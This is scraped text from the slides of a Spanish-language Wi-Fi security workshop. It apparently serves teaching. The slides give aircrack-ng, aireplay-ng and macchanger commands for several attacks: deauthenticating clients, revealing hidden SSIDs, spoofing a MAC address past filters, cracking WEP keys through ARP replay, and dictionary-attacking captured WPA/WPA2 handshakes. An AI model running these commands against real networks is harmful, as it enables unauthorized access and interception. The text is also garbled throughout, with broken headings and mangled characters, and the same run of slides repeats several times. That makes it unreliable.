httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 51: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 52: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

